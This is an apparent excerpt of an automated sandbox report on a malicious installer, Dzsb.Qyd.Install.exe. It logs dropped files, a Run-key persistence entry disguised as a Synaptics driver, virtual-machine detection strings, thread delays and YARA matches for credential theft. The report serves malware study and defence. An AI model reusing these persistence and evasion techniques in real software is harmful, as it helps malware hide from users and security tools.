                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile created: C:\ProgramData\Synaptics\RCXE0B2.tmpJump to dropped file
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile created: C:\ProgramData\Synaptics\RCXE0B2.tmpJump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Jump to dropped file
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 6760Thread sleep time: -600000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3936Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1328Thread sleep time: -780000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 1536Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Windows\splwow64.exeLast function: Thread delayed
                              Source: C:\Windows\splwow64.exeLast function: Thread delayed
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: Amcache.hve.13.drBinary or memory string: VMware
                              Source: Amcache.hve.13.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.13.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.13.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.13.drBinary or memory string: VMware-42 27 c8 0c e4 52 1d cc-a0 8f d3 a4 82 3e 8f 04
                              Source: Amcache.hve.13.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.13.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.13.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1441338159.000000000067C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.13.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.13.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.13.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.13.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.13.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.13.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.13.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.13.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.13.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.13.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.13.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.13.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.13.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.13.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.13.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.13.drBinary or memory string: VMware VMCI Bus Device
                              Source: Synaptics.exe, 00000014.00000002.2140164000.00000000007DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWG4
                              Source: Amcache.hve.13.drBinary or memory string: VMware Virtual RAM
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                              Source: Amcache.hve.13.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.13.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess created: C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe "C:\Users\user\Desktop\._cache_Dzsb.Qyd.Install.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\Dzsb.Qyd.Install.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: Amcache.hve.13.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.13.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.13.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.13.drBinary or memory string: MsMpEng.exe

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: Dzsb.Qyd.Install.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.Dzsb.Qyd.Install.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1244560230.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1274914579.0000000000694000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: Dzsb.Qyd.Install.exe PID: 7060, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 3588, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXE0B2.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
